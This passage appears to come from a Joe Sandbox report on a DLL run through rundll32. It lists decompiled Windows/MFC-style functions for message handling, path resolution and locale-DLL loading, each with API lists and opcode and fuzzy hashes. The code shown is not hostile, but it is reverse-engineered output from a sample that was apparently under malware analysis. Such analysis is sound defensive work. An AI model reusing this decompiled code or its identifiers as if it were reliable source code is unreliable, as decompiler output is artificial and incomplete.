                                                                        								 *((intOrPtr*)( *_t157 + 4))(1);
                                                                        								_t157 = 0;
                                                                        								__eflags = 0;
                                                                        								 *(_t195 + 0x3c) = 0;
                                                                        							}
                                                                        							__eflags = _t157;
                                                                        							if(_t157 != 0) {
                                                                        								goto L24;
                                                                        							} else {
                                                                        								goto L19;
                                                                        							}
                                                                        						}
                                                                        						if(_t108 == 0) {
                                                                        							 *(_t195 + 0x40) =  *(_t195 + 0x40) & _t108;
                                                                        							 *(_t195 + 0x44) =  *(_t195 + 0x44) | 0xffffffff;
                                                                        						}
                                                                        						goto L75;
                                                                        					}
                                                                        				} else {
                                                                        					L47:
                                                                        					__eflags =  *(_t183 + 0x38) & 0x00000401;
                                                                        					if(( *(_t183 + 0x38) & 0x00000401) == 0) {
                                                                        						L75:
                                                                        						 *[fs:0x0] =  *((intOrPtr*)(_t198 - 0xc));
                                                                        						return _t108;
                                                                        					}
                                                                        					_push( *_t155);
                                                                        					while(1) {
                                                                        						_t108 = E100220EE(_t198);
                                                                        						__eflags = _t108;
                                                                        						if(_t108 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t108 - _t183;
                                                                        						if(_t108 == _t183) {
                                                                        							L54:
                                                                        							__eflags = _t192 - 0x100;
                                                                        							if(_t192 < 0x100) {
                                                                        								L56:
                                                                        								__eflags = _t192 - 0x104;
                                                                        								if(_t192 < 0x104) {
                                                                        									L59:
                                                                        									_t108 = 0;
                                                                        									__eflags = 0;
                                                                        									L60:
                                                                        									__eflags =  *(_t183 + 0x39) & 0x00000004;
                                                                        									if(( *(_t183 + 0x39) & 0x00000004) != 0) {
                                                                        										goto L75;
                                                                        									}
                                                                        									__eflags = _t108;
                                                                        									if(_t108 != 0) {
                                                                        										L74:
                                                                        										_t108 = E10021710(_t108);
                                                                        										goto L75;
                                                                        									}
                                                                        									__eflags = _t192 - 0x201;
                                                                        									if(_t192 == 0x201) {
                                                                        										goto L74;
                                                                        									}
                                                                        									__eflags = _t192 - 0x203;
                                                                        									if(_t192 == 0x203) {
                                                                        										goto L74;
                                                                        									}
                                                                        									__eflags = _t192 - 0x204;
                                                                        									if(_t192 == 0x204) {
                                                                        										goto L74;
                                                                        									}
                                                                        									__eflags = _t192 - 0x206;
                                                                        									if(_t192 == 0x206) {
                                                                        										goto L74;
                                                                        									}
                                                                        									__eflags = _t192 - 0x207;
                                                                        									if(_t192 == 0x207) {
                                                                        										goto L74;
                                                                        									}
                                                                        									__eflags = _t192 - 0x209;
                                                                        									if(_t192 == 0x209) {
                                                                        										goto L74;
                                                                        									}
                                                                        									__eflags = _t192 - 0xa1;
                                                                        									if(_t192 == 0xa1) {
                                                                        										goto L74;
                                                                        									}
                                                                        									__eflags = _t192 - 0xa3;
                                                                        									if(_t192 == 0xa3) {
                                                                        										goto L74;
                                                                        									}
                                                                        									__eflags = _t192 - 0xa4;
                                                                        									if(_t192 == 0xa4) {
                                                                        										goto L74;
                                                                        									}
                                                                        									__eflags = _t192 - 0xa6;
                                                                        									if(_t192 == 0xa6) {
                                                                        										goto L74;
                                                                        									}
                                                                        									__eflags = _t192 - 0xa7;
                                                                        									if(_t192 == 0xa7) {
                                                                        										goto L74;
                                                                        									}
                                                                        									__eflags = _t192 - 0xa9;
                                                                        									if(_t192 != 0xa9) {
                                                                        										goto L75;
                                                                        									}
                                                                        									goto L74;
                                                                        								}
                                                                        								__eflags = _t192 - 0x107;
                                                                        								if(_t192 > 0x107) {
                                                                        									goto L59;
                                                                        								}
                                                                        								L58:
                                                                        								_t108 = 1;
                                                                        								goto L60;
                                                                        							}
                                                                        							__eflags = _t192 - 0x109;
                                                                        							if(_t192 <= 0x109) {
                                                                        								goto L58;
                                                                        							}
                                                                        							goto L56;
                                                                        						}
                                                                        						__eflags =  *(_t108 + 0x38) & 0x00000401;
                                                                        						if(( *(_t108 + 0x38) & 0x00000401) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_push(GetParent( *(_t108 + 0x1c)));
                                                                        					}
                                                                        					__eflags = _t108 - _t183;
                                                                        					if(_t108 != _t183) {
                                                                        						goto L75;
                                                                        					}
                                                                        					goto L54;
                                                                        				}
                                                                        			}





























                                                                        0x1001dc91
                                                                        0x1001dc83
                                                                        0x00000000
                                                                        0x1001dc79
                                                                        0x1001dbab
                                                                        0x1001dbb5
                                                                        0x1001dbb5
                                                                        0x1001dbb7
                                                                        0x1001dbc3
                                                                        0x1001dbc6
                                                                        0x1001dbc8
                                                                        0x1001dbc8
                                                                        0x1001dbc8
                                                                        0x1001dbc8
                                                                        0x1001dbe1
                                                                        0x1001dbe7
                                                                        0x1001dbeb
                                                                        0x1001dbf9
                                                                        0x1001dc04
                                                                        0x1001dc0a
                                                                        0x1001dc0d
                                                                        0x1001dc10
                                                                        0x1001dc23
                                                                        0x1001dc23
                                                                        0x1001dc36
                                                                        0x00000000
                                                                        0x1001dbed
                                                                        0x1001dbf0
                                                                        0x1001dbf5
                                                                        0x1001dbf7
                                                                        0x1001dc3c
                                                                        0x1001dc3c
                                                                        0x00000000
                                                                        0x1001dc3c
                                                                        0x00000000
                                                                        0x1001dbf7
                                                                        0x1001dbeb
                                                                        0x1001db4e
                                                                        0x1001db51
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001db53
                                                                        0x1001db57
                                                                        0x1001db86
                                                                        0x1001db89
                                                                        0x1001db93
                                                                        0x1001db93
                                                                        0x1001db59
                                                                        0x1001db5d
                                                                        0x1001db7b
                                                                        0x1001db7b
                                                                        0x00000000
                                                                        0x1001dabd
                                                                        0x1001dac3
                                                                        0x00000000
                                                                        0x1001dac3
                                                                        0x1001dabb
                                                                        0x1001da66
                                                                        0x1001da6b
                                                                        0x1001da6e
                                                                        0x1001da74
                                                                        0x1001da7d
                                                                        0x1001da80
                                                                        0x1001da80
                                                                        0x1001da82
                                                                        0x1001da82
                                                                        0x1001da85
                                                                        0x1001da87
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001da87
                                                                        0x1001da41
                                                                        0x1001da47
                                                                        0x1001da4a
                                                                        0x1001da4a
                                                                        0x00000000
                                                                        0x1001da41
                                                                        0x1001dcae
                                                                        0x1001dcae
                                                                        0x1001dcae
                                                                        0x1001dcb4
                                                                        0x1001dd7c
                                                                        0x1001dd82
                                                                        0x1001dd8a
                                                                        0x1001dd8a
                                                                        0x1001dcba
                                                                        0x1001dcd4
                                                                        0x1001dcd4
                                                                        0x1001dcd9
                                                                        0x1001dcdb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dcbe
                                                                        0x1001dcc0
                                                                        0x1001dce5
                                                                        0x1001dce5
                                                                        0x1001dceb
                                                                        0x1001dcf5
                                                                        0x1001dcf5
                                                                        0x1001dcfb
                                                                        0x1001dd0a
                                                                        0x1001dd0a
                                                                        0x1001dd0a
                                                                        0x1001dd0c
                                                                        0x1001dd0c
                                                                        0x1001dd10
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd12
                                                                        0x1001dd14
                                                                        0x1001dd76
                                                                        0x1001dd77
                                                                        0x00000000
                                                                        0x1001dd77
                                                                        0x1001dd16
                                                                        0x1001dd1c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd1e
                                                                        0x1001dd24
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd26
                                                                        0x1001dd2c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd2e
                                                                        0x1001dd34
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd36
                                                                        0x1001dd3c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd3e
                                                                        0x1001dd44
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd46
                                                                        0x1001dd4c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd4e
                                                                        0x1001dd54
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd56
                                                                        0x1001dd5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd5e
                                                                        0x1001dd64
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd66
                                                                        0x1001dd6c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd6e
                                                                        0x1001dd74
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd74
                                                                        0x1001dcfd
                                                                        0x1001dd03
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dd05
                                                                        0x1001dd07
                                                                        0x00000000
                                                                        0x1001dd07
                                                                        0x1001dced
                                                                        0x1001dcf3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dcf3
                                                                        0x1001dcc2
                                                                        0x1001dcc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dcd3
                                                                        0x1001dcd3
                                                                        0x1001dcdd
                                                                        0x1001dcdf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001dcdf

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$State$Parent$ClientCursorH_prologScreenWindow
                                                                        • String ID: $($?$@
                                                                        • API String ID: 986702660-3087990773
                                                                        • Opcode ID: 730b00cf02757afbb45aa2589ad9d443bed1e78584191d63332f96461586f59c
                                                                        • Instruction ID: 1dbbc6cbb32d877c3bf6b6c124918af026ae206f3974ca55ec8039dacab70468
                                                                        • Opcode Fuzzy Hash: 730b00cf02757afbb45aa2589ad9d443bed1e78584191d63332f96461586f59c
                                                                        • Instruction Fuzzy Hash: 18B1CD71E007269FEF51FF64C884B9EBBB1EB04344F11456AEA56AE1A2D774E8C0CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1002592C(void* __ebx, void* __edi, void* __esi) {
                                                                        				intOrPtr _t33;
                                                                        				long _t35;
                                                                        				intOrPtr* _t36;
                                                                        				void* _t43;
                                                                        				void* _t49;
                                                                        				CHAR* _t69;
                                                                        				void* _t74;
                                                                        				void* _t76;
                                                                        
                                                                        				E10011BF0(0x1003acd2, _t76);
                                                                        				_t33 =  *0x1004c470; // 0x1bfbe703
                                                                        				_t69 =  *(_t76 + 8);
                                                                        				 *((intOrPtr*)(_t76 - 0x10)) = _t33;
                                                                        				_t35 = GetFullPathNameA( *(_t76 + 0xc), 0x104, _t69, _t76 - 0x154);
                                                                        				if(_t35 != 0) {
                                                                        					if(_t35 < 0x104) {
                                                                        						_t36 = E100243B2();
                                                                        						_t67 =  *_t36;
                                                                        						 *(_t76 + 8) =  *((intOrPtr*)( *_t36 + 0xc))() + 0x10;
                                                                        						 *((intOrPtr*)(_t76 - 4)) = 0;
                                                                        						E100258EA(0, _t69, _t76 + 8);
                                                                        						if(PathIsUNCA( *(_t76 + 8)) != 0) {
                                                                        							L15:
                                                                        							_t74 = 1;
                                                                        						} else {
                                                                        							if(GetVolumeInformationA( *(_t76 + 8), 0, 0, 0, _t76 - 0x15c, _t76 - 0x158, 0, 0) != 0) {
                                                                        								if(( *(_t76 - 0x158) & 0x00000002) == 0) {
                                                                        									CharUpperA(_t69);
                                                                        								}
                                                                        								if(( *(_t76 - 0x158) & 0x00000004) != 0) {
                                                                        									goto L15;
                                                                        								} else {
                                                                        									_t49 = FindFirstFileA( *(_t76 + 0xc), _t76 - 0x150);
                                                                        									if(_t49 == 0xffffffff) {
                                                                        										goto L15;
                                                                        									} else {
                                                                        										FindClose(_t49);
                                                                        										if( *(_t76 - 0x154) == 0 ||  *(_t76 - 0x154) <= _t69 || lstrlenA(_t76 - 0x124) - _t69 +  *(_t76 - 0x154) >= 0x104) {
                                                                        											goto L6;
                                                                        										} else {
                                                                        											lstrcpyA( *(_t76 - 0x154), _t76 - 0x124);
                                                                        											goto L15;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								L6:
                                                                        								_t74 = 0;
                                                                        							}
                                                                        						}
                                                                        						E100014B0( &(( *(_t76 + 8))[0xfffffffffffffff0]), _t67);
                                                                        						_t43 = _t74;
                                                                        					} else {
                                                                        						goto L3;
                                                                        					}
                                                                        				} else {
                                                                        					lstrcpynA(_t69,  *(_t76 + 0xc), 0x104);
                                                                        					L3:
                                                                        					_t43 = 0;
                                                                        				}
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
                                                                        				return E100117AE(_t43,  *((intOrPtr*)(_t76 - 0x10)));
                                                                        			}












                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10025931
                                                                        • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                        • lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                          • Part of subcall function 100258EA: lstrcpynA.KERNEL32(00000000,?,00000104), ref: 1002590F
                                                                          • Part of subcall function 100258EA: PathStripToRootA.SHLWAPI(00000000), ref: 10025916
                                                                        • PathIsUNCA.SHLWAPI(?,?,?), ref: 100259A1
                                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 100259C5
                                                                        • CharUpperA.USER32(?), ref: 100259DD
                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 100259F6
                                                                        • FindClose.KERNEL32(00000000), ref: 10025A02
                                                                        • lstrlenA.KERNEL32(?), ref: 10025A1F
                                                                        • lstrcpyA.KERNEL32(?,?), ref: 10025A3E
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                                                        • String ID:
                                                                        • API String ID: 4080879615-0
                                                                        • Opcode ID: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                        • Instruction ID: 1fd06765c8897f0dc9d05cfa7245a04573121f8266c58d07b0a106865c59afd7
                                                                        • Opcode Fuzzy Hash: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                        • Instruction Fuzzy Hash: E531B271900168EFDB11CFA0DC88EEEBBBCEF45396F404266F406DA151D7319E848B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 81%
                                                                        			E1002FE1B(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				signed int _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr* _v20;
                                                                        				struct tagPOINT _v28;
                                                                        				intOrPtr _v40;
                                                                        				signed char _v69;
                                                                        				char _v76;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t62;
                                                                        				intOrPtr _t68;
                                                                        				intOrPtr _t70;
                                                                        				intOrPtr _t77;
                                                                        				short _t78;
                                                                        				short _t85;
                                                                        				short _t90;
                                                                        				intOrPtr _t109;
                                                                        				intOrPtr _t113;
                                                                        				intOrPtr _t114;
                                                                        				intOrPtr* _t116;
                                                                        
                                                                        				_t113 = _a4;
                                                                        				_t116 = __ecx;
                                                                        				if(E10020B0B(__ecx, _t113) != 0) {
                                                                        					L37:
                                                                        					return 1;
                                                                        				}
                                                                        				_t114 =  *((intOrPtr*)(_t113 + 4));
                                                                        				_v20 = E10008325(__ecx);
                                                                        				if(( *(__ecx + 0x7c) & 0x00000020) != 0 || _t114 == 0x201 || _t114 == 0x202) {
                                                                        					if(_t114 < 0x200 || _t114 > 0x209) {
                                                                        						if(_t114 < 0xa0 || _t114 > 0xa9) {
                                                                        							goto L30;
                                                                        						} else {
                                                                        							goto L8;
                                                                        						}
                                                                        					} else {
                                                                        						L8:
                                                                        						_v16 = E100373DB();
                                                                        						_t70 = _a4;
                                                                        						_v28.y =  *((intOrPtr*)(_t70 + 0x18));
                                                                        						_v28.x =  *(_t70 + 0x14);
                                                                        						ScreenToClient( *(_t116 + 0x1c),  &_v28);
                                                                        						E10011C50( &_v76, 0, 0x30);
                                                                        						_v76 = 0x28;
                                                                        						_t77 =  *((intOrPtr*)( *_t116 + 0x6c))(_v28.x, _v28.y,  &_v76);
                                                                        						_t128 = _v40 - 0xffffffff;
                                                                        						_v8 = _t77;
                                                                        						if(_v40 != 0xffffffff) {
                                                                        							_push(_v40);
                                                                        							E100107C8(0x201, _t114, _t116, _t128);
                                                                        						}
                                                                        						if(_t114 != 0x201 || (_v69 & 0x00000080) == 0) {
                                                                        							_v12 = _v12 & 0x00000000;
                                                                        							__eflags = _t114 - 0x201;
                                                                        							if(_t114 != 0x201) {
                                                                        								_t90 = GetKeyState(1);
                                                                        								__eflags = _t90;
                                                                        								if(_t90 < 0) {
                                                                        									_v8 =  *((intOrPtr*)(_v16 + 0x78));
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_v12 = 1;
                                                                        						}
                                                                        						if(_v8 < 0 || _v12 != 0) {
                                                                        							_t78 = GetKeyState(1);
                                                                        							__eflags = _t78;
                                                                        							if(_t78 >= 0) {
                                                                        								L28:
                                                                        								 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
                                                                        								KillTimer( *(_t116 + 0x1c), 0xe001);
                                                                        								goto L29;
                                                                        							}
                                                                        							__eflags = _v12;
                                                                        							if(_v12 == 0) {
                                                                        								goto L29;
                                                                        							}
                                                                        							goto L28;
                                                                        						} else {
                                                                        							if(_t114 != 0x202) {
                                                                        								__eflags =  *(_t116 + 0x78) & 0x00000008;
                                                                        								if(( *(_t116 + 0x78) & 0x00000008) != 0) {
                                                                        									L25:
                                                                        									 *((intOrPtr*)( *_t116 + 0x160))(_v8);
                                                                        									L29:
                                                                        									 *((intOrPtr*)(_v16 + 0x78)) = _v8;
                                                                        									goto L30;
                                                                        								}
                                                                        								_t85 = GetKeyState(1);
                                                                        								__eflags = _t85;
                                                                        								if(_t85 < 0) {
                                                                        									goto L25;
                                                                        								}
                                                                        								_t109 = _v16;
                                                                        								__eflags = _v8 -  *((intOrPtr*)(_t109 + 0x78));
                                                                        								if(_v8 ==  *((intOrPtr*)(_t109 + 0x78))) {
                                                                        									goto L29;
                                                                        								}
                                                                        								_push(0x12c);
                                                                        								_push(0xe000);
                                                                        								L24:
                                                                        								E1002F4CC(_t116);
                                                                        								goto L29;
                                                                        							}
                                                                        							 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
                                                                        							_push(0xc8);
                                                                        							_push(0xe001);
                                                                        							goto L24;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					L30:
                                                                        					_t62 = E10022AD5(_t116);
                                                                        					if(_t62 == 0 ||  *((intOrPtr*)(_t62 + 0x64)) == 0) {
                                                                        						if(_v20 == 0) {
                                                                        							L35:
                                                                        							if(IsWindow( *(_t116 + 0x1c)) == 0) {
                                                                        								goto L38;
                                                                        							}
                                                                        							return E10021527(_a4);
                                                                        						} else {
                                                                        							goto L33;
                                                                        						}
                                                                        						while(1) {
                                                                        							L33:
                                                                        							_t115 = _v20;
                                                                        							_push(_a4);
                                                                        							if( *((intOrPtr*)( *_v20 + 0x100))() != 0) {
                                                                        								goto L37;
                                                                        							}
                                                                        							_t68 = E10022A96(_t115);
                                                                        							_v20 = _t68;
                                                                        							if(_t68 != 0) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L35;
                                                                        						}
                                                                        						goto L37;
                                                                        					} else {
                                                                        						L38:
                                                                        						__eflags = 0;
                                                                        						return 0;
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: State$ClientKillParentScreenTimerWindow
                                                                        • String ID: (
                                                                        • API String ID: 1540673551-3887548279
                                                                        • Opcode ID: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                        • Instruction ID: 52046703db0e3be90f8dc11269cbd7e61114aefd04d05f62ac3939d045805729
                                                                        • Opcode Fuzzy Hash: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                        • Instruction Fuzzy Hash: E4519E35A00249DFDB51DFA4D988BADBBF1EF48390F51007DE915AB2E2D7709A81CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 63%
                                                                        			E10032A2D(void* __ecx, signed int _a4, long _a8) {
                                                                        				struct HWND__* _v8;
                                                                        				long _t24;
                                                                        				void* _t29;
                                                                        				int _t32;
                                                                        				struct HWND__* _t36;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t29 = __ecx;
                                                                        				if(GetKeyState(0x11) < 0) {
                                                                        					_push(8);
                                                                        					_pop(0);
                                                                        				}
                                                                        				if(GetKeyState(0x10) < 0) {
                                                                        					_push(4);
                                                                        					_pop(0);
                                                                        				}
                                                                        				_t36 = GetFocus();
                                                                        				_v8 = GetDesktopWindow();
                                                                        				if(_t36 != 0) {
                                                                        					_t32 = _a4 << 0x10;
                                                                        					do {
                                                                        						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
                                                                        						_t36 = GetParent(_t36);
                                                                        					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
                                                                        				} else {
                                                                        					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
                                                                        				}
                                                                        				return _t24;
                                                                        			}


                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendState$DesktopFocusParentWindow
                                                                        • String ID:
                                                                        • API String ID: 4150626516-0
                                                                        • Opcode ID: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                        • Instruction ID: b978b154d262d257bd1bf3691abd3912275a9b299a299c021808da74b3d9ae9a
                                                                        • Opcode Fuzzy Hash: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                        • Instruction Fuzzy Hash: BD11CA32A00B39BFE7629BA68C84E593B98EB44792F114425FE41DF141D6B0EC41D7B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E100348C4(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4, char _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char _v284;
                                                                        				intOrPtr _t10;
                                                                        				void* _t15;
                                                                        				void* _t19;
                                                                        				void* _t20;
                                                                        				void* _t22;
                                                                        
                                                                        				_t22 = __esi;
                                                                        				_t20 = __ecx;
                                                                        				_t19 = __ebx;
                                                                        				_t27 = _a8 - 0x800;
                                                                        				_t10 =  *0x1004c470; // 0x1bfbe703
                                                                        				_v8 = _t10;
                                                                        				if(_a8 != 0x800) {
                                                                        					__eflags = GetLocaleInfoA(_a8, 3,  &_a8, 4);
                                                                        					if(__eflags != 0) {
                                                                        						goto L2;
                                                                        					} else {
                                                                        					}
                                                                        				} else {
                                                                        					lstrcpyA( &_a8, "LOC");
                                                                        					L2:
                                                                        					_push(_t22);
                                                                        					_t15 = E10011D44(_t19, _t20, _t27,  &_v284, 0x112, _a4,  &_a8);
                                                                        					if(_t15 == 0xffffffff || _t15 >= 0x112) {
                                                                        						_t12 = 0;
                                                                        						__eflags = 0;
                                                                        					} else {
                                                                        						_t12 = LoadLibraryA( &_v284);
                                                                        					}
                                                                        				}
                                                                        				return E100117AE(_t12, _v8);
                                                                        			}


                                                                        APIs
                                                                        • lstrcpyA.KERNEL32(00000800,LOC), ref: 100348E7
                                                                        • LoadLibraryA.KERNEL32(?), ref: 1003491A
                                                                        • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 1003492A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLibraryLoadLocalelstrcpy
                                                                        • String ID: LOC
                                                                        • API String ID: 864663389-519433814
                                                                        • Opcode ID: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                        • Instruction ID: 1b661f8c901bfcf78996fae171bebb1d1a637ee772a53719b66f99f2a01cec23
                                                                        • Opcode Fuzzy Hash: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                        • Instruction Fuzzy Hash: 6C018B3990111CAFEB62DFA0DC49EDE37ACEB00326F018562FA15DE190DB30EA448B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E10034959(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v24;
                                                                        				void* _v28;
                                                                        				void* _v32;
                                                                        				int _v36;
                                                                        				int _v40;
                                                                        				signed short _v44;
                                                                        				int _v52;
                                                                        				int _v56;
                                                                        				int _v60;
                                                                        				int _v64;
                                                                        				intOrPtr _t42;
                                                                        				struct HINSTANCE__* _t43;
                                                                        				_Unknown_base(*)()* _t44;
                                                                        				struct HINSTANCE__* _t46;
                                                                        				void* _t47;
                                                                        				signed int _t50;
                                                                        				signed short _t65;
                                                                        				signed int _t66;
                                                                        				int _t70;
                                                                        				signed short _t71;
                                                                        				signed int _t72;
                                                                        				signed short _t78;
                                                                        				signed int _t79;
                                                                        				char* _t85;
                                                                        				int _t87;
                                                                        				signed int _t95;
                                                                        				signed int _t99;
                                                                        				int _t100;
                                                                        				int _t101;
                                                                        				void* _t105;
                                                                        				void* _t109;
                                                                        
                                                                        				_t42 =  *0x1004c470; // 0x1bfbe703
                                                                        				_t85 = 0;
                                                                        				_v8 = _t42;
                                                                        				_v28 = 0;
                                                                        				_t43 = GetModuleHandleA("kernel32.dll");
                                                                        				_v36 = _t43;
                                                                        				_t44 = GetProcAddress(_t43, "GetUserDefaultUILanguage");
                                                                        				if(_t44 == 0) {
                                                                        					if(GetVersion() >= 0) {
                                                                        						_t46 = GetModuleHandleA("ntdll.dll");
                                                                        						if(_t46 == 0) {
                                                                        							L13:
                                                                        							 *((intOrPtr*)(_t109 + 0xffffffffffffffc4)) = 0x800;
